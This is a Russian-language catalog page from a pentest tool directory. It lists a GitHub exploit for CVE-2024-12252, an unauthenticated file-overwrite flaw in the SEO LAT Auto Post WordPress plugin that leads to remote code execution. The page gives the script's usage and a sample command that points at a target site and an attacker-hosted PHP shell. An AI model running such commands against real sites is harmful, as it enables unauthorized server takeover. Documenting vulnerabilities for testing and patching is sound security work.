Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-12252 — SEO LAT Auto Post <= 2.2.1 - Отсутствие авторизации для перезаписи/загрузки файлов (Remote Code Execution) | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-12252
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubnxploited/cve-2024-12252

CVE-2024-12252

SEO LAT Auto Post <= 2.2.1 - Отсутствие авторизации для перезаписи/загрузки файлов (Remote Code Execution)

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

SEO LAT Auto Post <= 2.2.1 - Удаленное выполнение кода

Описание

Плагин SEO LAT Auto Post для WordPress уязвим к перезаписи файлов из-за отсутствия проверки прав доступа в AJAX-действии remote_update во всех версиях до 2.2.1 включительно. Это позволяет неаутентифицированным атакующим перезаписывать файл seo-beginner-auto-post.php, что может быть использовано для удаленного выполнения кода.

Детали уязвимости

  • CVE: CVE-2024-12252
  • Оценка CVSS: 9.8 (Критическая)

Эксплуатация

Этот скрипт эксплуатирует уязвимость в плагине SEO LAT Auto Post для достижения удаленного выполнения кода путем перезаписи файла seo-beginner-auto-post.php. Скрипт автоматизирует процесс проверки версии плагина, запуска эксплойта и предоставляет интерактивную оболочку для выполнения команд.

Использование

root@kitploit:~
usage: CVE-2024-12252.py [-h] -u URL --attack-url ATTACK_URL

CVE-2024-12252 | SEO LAT Auto Post <= 2.2.1 - Remote Code Execution # by: By Nxploit | Khaled Alenazi

options:
-h, --help            показать это справочное сообщение и выйти
-u, --url URL         Базовый URL цели (например, http://example.com/wordpress)
--attack-url ATTACK_URL
                      Прямой URL к вашей вредоносной PHP-оболочке

Запустите скрипт с целевым URL и URL вашей вредоносной PHP-оболочки:

root@kitploit:~
python CVE-2024-12252.py -u http://example.com/wordpress --attack-url http://yourserver.com/shell.php

Ссылки

  • Wordfence Intelligence
  • CVE-2024-12252
Скачать инструмент